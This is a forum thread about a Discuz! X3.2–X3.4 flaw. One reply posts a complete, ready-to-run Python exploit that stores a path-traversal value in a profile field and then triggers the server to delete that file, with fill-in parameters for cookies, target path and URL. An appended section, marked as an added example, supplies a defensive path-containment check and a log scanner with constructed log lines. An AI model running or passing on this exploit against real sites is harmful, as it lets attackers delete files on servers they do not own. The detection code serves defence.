Discuz!X3.4 X3.3 X3.2: vulnerability to permanently delete your account on any DZ forum (discuz discussion)

游客1 (Guest group)

站长窝论坛 copyright notice 1. Post title: Discuz!X3.4 X3.3 X3.2: vulnerability to permanently delete your account on any DZ forum
2. Forum URL: 站长窝论坛
3. Some of the forum's resources come from the internet; if any infringe your rights, please contact the administrator for removal.
4. Member posts represent only the member's own views; the site neither endorses them nor vouches for their accuracy.
5. Posting or reposting illegal information in any form is prohibited; visitors who find such content should report it to the administrator.
6. This post was originally published by 游客1 in the 《程序综合区》 (General Programs) board of 站长窝论坛; please credit the source when reposting.
Comments
Latest replies (186)
  • momoxiao (Level 1 user group)
    #68 Quote
    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Discuz!X <= 3.4 arbitrary file deletion.
    # Two steps: store a path in the birthprovince profile field, then submit
    # deletefile[birthprovince] so the server unlinks the stored path.
    # Written by Aaron. Ported from Python 2; only `requests` is required.
    import re
    import requests

    USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'
    HEADERS = {'User-Agent': USER_AGENT}


    def get_cookie(raw_cookies):
        """Turn a 'k=v; k2=v2' Cookie header string into a dict for requests."""
        cookies = {}
        for line in raw_cookies.split(';'):
            key, value = line.strip().split('=', 1)
            cookies[key] = value
        return cookies


    def get_formhash(url, cookies):
        """Fetch the logged-in user's CSRF token (formhash) from the space control panel."""
        testurl = url + "/home.php?mod=spacecp"
        s = requests.get(testurl, cookies=cookies, headers=HEADERS)
        com = re.compile(r'<input type="hidden" name="formhash" value="(.*?)" />')
        result = com.findall(s.text)
        return result[0]


    def del_step1(url, filename, cookies):
        """Step 1: save the target path into the birthprovince profile field."""
        geturl = url + "/home.php?mod=spacecp&ac=profile&op=base"
        formhash = get_formhash(url, cookies)
        payload = {'birthprovince': filename, 'profilesubmit': 1, 'formhash': formhash}
        r = requests.post(geturl, data=payload, headers=HEADERS, cookies=cookies)
        if r.text.find('parent.show_success') > 0:
            print('Step1 success!!!')


    def del_step2(url, cookies):
        """Step 2: submit deletefile[birthprovince]; the server deletes the stored path."""
        geturl = url + "/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
        formhash = get_formhash(url, cookies)
        # 1.jpg must exist in the working directory; any small image will do.
        with open('1.jpg', 'rb') as img:
            files = {
                'formhash': (None, formhash),
                'birthprovince': ('1.jpg', img, 'image/jpeg'),
                'profilesubmit': (None, '1'),
            }
            r = requests.post(geturl, files=files, headers=HEADERS, cookies=cookies)
        if r.text.find('parent.show_success') > 0:
            print('Step2 success!!!')


    if __name__ == '__main__':
        # Change the following three parameters:
        # 1. The cookie of a logged-in account on the target forum
        raw_cookies = "G2pl_2132_sid=sKKQZK; G2pl_2132_saltkey=Sz3Zk9qK; G2pl_2132_lastvisit=1506772875; G2pl_2132_lastact=1506779386%09home.php%09spacecp; G2pl_2132_seccode=7.aa0407e77fa5c31c1b; G2pl_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile%2526op%253Dbase; G2pl_2132_ulastactivity=d085JjIjS5HiG3obxleJQuw0zNYpIN60OXJV0J6di%2B8aFmKQ4u6l; G2pl_2132_auth=86c5F09hGuaZuGNPSX7Pr7Oy4Mq2B39nSviv%2FRFC8vdn1Zjb9PibvU2fN4jJr9Hr7yVNf2vH9rIXrSLWhMZk; G2pl_2132_nofavfid=1; G2pl_2132_sendmail=1; G2pl_2132_noticeTitle=1"
        # 2. The file to delete (a traversal path, as in the original)
        filename = "../../../111.txt"
        # 3. The target URL
        url = "http://127.0.0.1"
        cookies = get_cookie(raw_cookies)
        del_step1(url, filename, cookies)
        del_step2(url, cookies)
    2018/07/20 20:58:01
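The defender's side of the two-step deletion in momoxiao's script, as an added example that is not part of the post or of Discuz! itself. The first function is the path-containment check a patched profile handler should make before unlinking a stored value (it rejects the script's `../../../111.txt` while accepting a normal attachment name); the second scans web-server log lines for the request shape the exploit produces (a POST to `home.php?mod=spacecp&ac=profile` with a `deletefile[...]` key on a field that never holds a file). The upload directory, the allow-list of file-bearing fields, and the log lines are all constructed assumptions.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs

# Assumed upload root; the real Discuz! attachment path is configured per site.
UPLOAD_ROOT = "/var/www/discuz/data/attachment/profile"

# Hypothetical allow-list: profile fields that legitimately carry an uploaded
# file and may therefore appear in deletefile[]. birthprovince is not one.
PROFILE_FIELDS_WITH_FILES = {"avatar"}


def safe_delete_target(upload_root, stored_value):
    """Return the resolved path if it stays inside upload_root, else None.

    The vulnerable flow trusted the stored profile value and unlinked
    upload_root + value. Resolving the joined path and checking that it is
    still under the root rejects traversal ('../../../111.txt') and absolute
    paths, and refuses to return the root directory itself.
    """
    root = os.path.realpath(upload_root)
    candidate = os.path.realpath(os.path.join(root, stored_value))
    if os.path.commonpath([root, candidate]) != root:
        return None
    if candidate == root:
        return None
    return candidate


# Constructed combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.7 - - [20/Jul/2018:20:51:03 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [20/Jul/2018:20:51:09 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bbirthprovince%5D=aaaaaa HTTP/1.1" 200 498 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Jul/2018:20:52:11 +0800] "GET /forum.php?mod=viewthread&tid=1 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Jul/2018:20:53:40 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bavatar%5D=1 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
DELETEFILE_KEY = re.compile(r"deletefile\[(\w+)\]")


def find_deletefile_abuse(log_text):
    """Return (ip, timestamp, field) for every POST to the profile editor that
    carries deletefile[<field>] for a field outside the allow-list, i.e. the
    exploit's step 2. parse_qs percent-decodes the bracketed key for us."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/home.php":
            continue
        qs = parse_qs(parts.query)
        if qs.get("mod") != ["spacecp"] or qs.get("ac") != ["profile"]:
            continue
        for key in qs:
            dm = DELETEFILE_KEY.fullmatch(key)
            if dm and dm.group(1) not in PROFILE_FIELDS_WITH_FILES:
                hits.append((m.group("ip"), m.group("ts"), dm.group(1)))
    return hits


if __name__ == "__main__":
    print(safe_delete_target(UPLOAD_ROOT, "abc123.jpg"))
    print(safe_delete_target(UPLOAD_ROOT, "../../../111.txt"))
    for ip, ts, field in find_deletefile_abuse(SAMPLE_LOG):
        print(f"{ts} {ip} deletefile[{field}] on a non-file field")
```

The log scan flags only the second request of the pair; correlating it with a preceding profile POST from the same IP or session (the first line in the sample) gives higher confidence, but the `deletefile[]` key on a text-only field is already enough to investigate.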